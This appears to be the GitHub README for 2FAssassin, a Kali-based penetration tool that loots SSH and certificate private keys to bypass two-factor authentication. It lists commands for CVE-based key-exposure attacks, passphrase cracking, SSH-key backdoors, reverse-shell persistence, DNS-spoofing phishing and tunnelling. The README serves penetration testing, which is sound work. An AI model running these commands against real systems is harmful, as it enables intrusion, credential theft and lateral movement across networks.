-
Notifications
You must be signed in to change notification settings - Fork 72
/
README
370 lines (260 loc) · 15.1 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
## Notes ##
- Will upload LATEST codes by 10th September 2017.
## Preamble ##
- Code changes from time to time, please do a 'git pull' before running the tool.
## Intro ##
- The effectiveness of the Two-Factor-Authentication depends on how well a user protects "something only the user has".
- The tool looks out for getting the OTP(s) and private keys using various methods.
- The private keys can be extracted from client certificates and cracked to be used for authentication.
- The tool exploits the common vulnerabilities that caused private keys leakage.
- Propagates the compromise starting from a single machine to the entire networks via looted private keys.
## Installing ##
- Install python on Kali Linux, then run:
pip install 2fassassin
cd /root/2fassassin
OR
git clone https://github.com/maxwellkoh/2FAssassin.git
cd 2fassassin
## Features ##
root@kali:~/2fassassin# python assassin.py -h
___ ___ _ _
|_ ) __/_\ ______ __ _ _____(_)_ _
/ /| _/ _ \ (_-<_-</ _` (_-<_-< | ' \+v2
/___|_/_/ \_\/__/__/\__,_/__/__/_|_||_|
usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN]
[--check CHECK] [--cert CERT] [--filetype FILETYPE]
[--user USER] [--secret SECRET] [--host HOST] [--mode MODE]
[--auto AUTO] [--post POST] [--db DB] [--key KEY]
[--log LOG]
Bypass 2FA - SMS, Voice, SSH
optional arguments:
-h, --help show this help message and exit
--target TARGET IP Address
--silent reduce output verbosity
--scan SCAN Network enumeration { basic | advanced }
--check CHECK Check for vulnerabilities, modules
--cert CERT Certificate management
--filetype FILETYPE Specify file *.extension
--user USER username
--secret SECRET password
--host HOST server ip
--mode MODE mode
--auto AUTO auto mode for automation
--post POST post modules
--db DB Manage your trophies.
--key KEY keys management
--log LOG View logs
root@kali:~/2fassassin#
## Example Usage ##
- Network enumeration:
./assassin.py --scan <basic | advanced> --target <ip_address | range>
./assassin.py --scan advanced --target 192.168.0.0/24
./assassin.py --scan basic --target 192.168.2.40
AUTOMATIC MODE
--------------
* Check everythings (common vulnerabilities) that cause the private keys to leak out.
./assassin.py --check auto --mode attack
Network Enumeration
+
| Building Target Database
|
v
+----------------------------------------------------------------------------+
|SSH-based Attacks |
|ShellShock |
|HeartBleed |
|Ceragon FibeAir IP-10 SSH Private Key Exposure |
|ExaGrid Known SSH Key and Default Password |
|F5 BIG-IP SSH Private Key Exposure |
|Loadbalancer.org Enterprise VA SSH Private Key |
|Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution|
|Quantum DXi V1000 SSH Private Key Exposure |
+-------------------------------------+--------------------------------------+
|
| POST Modules
v
Keys Extraction
+
| Looted Keys
|
v
Key-based Authentication
Manual MODE
-----------
* SSH-based Attacks to get private keys
./assassin.py --check ssh --mode attack
* HeartBleed Attacks to get private keys:
./assasin.py --check heartbleed --mode attack
* Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936
./assassin.py --check ceragon --mode attack
* ExaGrid Known SSH Key and Default Password : CVE-2016-1560
./assassin.py --check exagrid --mode attack
* F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493
./assassin.py --check f5 --mode attack
* Loadbalancer.org Enterprise VA SSH Private Key
./assassin.py --check loadbalancer --mode attack
* Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution
./assassin.py --check array --mode attack
* Quantum DXi V1000 SSH Private Key Exposure
./assassin.py --check quantum --mode attack
* Check & disable Two-Factor Authentication
./assassin.py --check config --mode attack
POST MODE
---------
* Once you looted the private keys, perform key-based authentication to all targets in the database
./assassin.py --check ssh --mode auth
Certificate Handling
---------------------
#4
Remove Passphrase <---------------------------+
+ |
| |
| #3 |
| Parsing Cracked Passphase |
| |
Analyze Certificate | |
+ v |
| |
| +---------------------------+ |
| | | +
#1 +----------> | ^^^^^^^^^^^^^^^^^^^^^ | <---------+ Getting Passphrase
| PKCS#12 Certificate | { Cracking | Stealing }
| ^^^^^^^^^^^^^^^^^^^^^ | #2
| |
+----------+-----+----------+
| | keep for later use <--------+
| | :) |
| | |
| | |
#5 | | #6 |
Extract Public Key <----------------+ +--------------------> Extract Private Key+
+
|
v #10
Validate Domain #7 Authenticate to SSL Server <-------+
+ |
| |
v #9 |
Real Domain Hunting +----------------> Prepare Client Machine +--------------------+
#8 +----------------------------+ SSL/HTTPS
| Loading Client|Certificate |
+----------------------------+
* Look for potential certificate files (contains private keys inside!!!)
./assassin.py --cert analyze --filetype pfx
* Cracking PKCS#12 Passphrases:
{Dictionary Attacks -- using wordlist}
./assassin.py --cert crack --mode dic --filetype pfx
{Pure Brute Force + Mutation}
./assassin.py --cert crack --mode bruteforce --filetype pfx
* Dissect the certificate file + removing the passphrases + hunting for correct domain (target server)
./assassin.py --cert dissect --filetype pfx
* Preparing client machine + install cracked certificate + authenticate to SSL server
./assassin.py --cert windows --user <username> --secret <password> --host <client_machine_ip>
#2 Loads client-certificate
+-----------------+ +----------------+ +------------------+
| Attacker Machine| | Windows Client | | SSL Website |
| (2FAssassin) +---------> |(172.16.173.180)+-----------------> | (172.16.173.182) |
+-----------------+ +----------------+ +------------------+
Sends client-certificate, instruction script Authenticates to remote SSL website
#1 #3
Backdoor
--------
#4 {add keys}
'2fassassin' +---------> account_1
#1 +-----------+ |
+-------------> |create user| +---------> account_2
| #2 +--------------------+ |
sshkey +-------------> |generate RSA keypair| +---------> account_3
| #3 +------------------------+ |
+-------------> |access to remote server| -------+---------> account_4
+------------------------+ |
+---------> account_5
|
+---------> .........
* Add arbitrary SSH keys to all the accessible accounts
./assassin.py --check sshkey --mode attack
* Drop persistent backdoor (reverse shell) to all the accessible accounts
./assassin.py --check reverse --mode attack
Impersonation / Client Side Attacks
-----------------------------------
#1
Server certificate was stolen by attacker
+------------+
| Attacker | <-----------------------------------------------------------+
|(2FAssassin)| |
+----+--+----+ |
| ^ |
| | #7 |
| | reverse shell |
| | connects back |
| | to attacker |
| | |
| | +----------------+ (normal) +---------+--------+
| | | Windows Client | client auth | SSL Website |
| +-------------------+(172.16.173.180)+-----------------> | (172.16.173.182) |
| +----------+-+---+ +------------------+
| ^ |
| #4 | |
| SSL webiste is now | |
| at 172.16.173.194 | +-------------------------------+ #6
| | | client download
| | #5 | malware from the
| #3 +-----+-----------+ (abnormal) | phishing website
| DNS Spoofing | | client auth |
+-------------------------> | DNS Server | |
| |(172.16.173.191) | |
| | | |
| +-----------------+ |
| |
| +------------------+
+----------------------------------------------------------> | Phishing Website |
#2 Attacker cracked the server certificate, then use it | (172.16.173.194) |
to set up phishing website +------------------+
* Setup phishing website + DNS Spoofing Attacks
./assassin.py --filetype pfx --spoof <phishing_server_ip> --user <username> --secret <password> --target <victim_ip> --gateway <dns_ip> --mitm <on|off>
Tunnelling
-----------
* Create ssh tunnel using looted private keys (greater the chain value, longer the ssh tunnel)
./assassin.py --tunnel ssh --chain 1 --user <username> --secret password --user2 <username> --host <server_ip>
./assassin.py --tunnel ssh --chain 2 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2>
./assassin.py --tunnel ssh --chain 3 --user <username> --secret password --user2 <username2> --host <server_ip> --user3 <username3> --host2 <server_ip2> --user4 <username4> --host3 <server_ip3>
Administration
---------------
* View activity output:
./assassin.py --log all
* See what (e.g., credentials) you've got:
./assassin.py --log loot
* Find out the origin of the SSH user:
./assassin.py --log whereis --user <username>
* Find out what SSH accounts are remotely accessible:
./assassin.py --log account --host <target_host>
Investigation
--------------
* Check if a remote host using key-based authentication
./assassin.py --check pka --mode detect
* Find out which machine hosting the user account
./assassin.py --log whereis --user <username>
* Find out what accounts can potentially be accessed by a specific user
./assassin.py --log account --host <ip_address>
## FAQ ##
- Error when launching network enumeration
Try loading the msgprc at msfconsole, and define the password (e.g., load msgrpc Pass=abc123)
- The user "2fassassin" not found when "./assassin.py --check sshkey --mode attack"
Try create the user manually:
useradd --force-badname 2fassassin
su 2fassassin
cd $home
ssh-keygen -t rsa
## Limitations ##
- Development Status :: 2 - Pre-Alpha
- Currently still under active development.
## Copyright ##
2FAssassin - Created and maintained by Maxwell Koh
This program is free software: you can redistribute it and/
or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>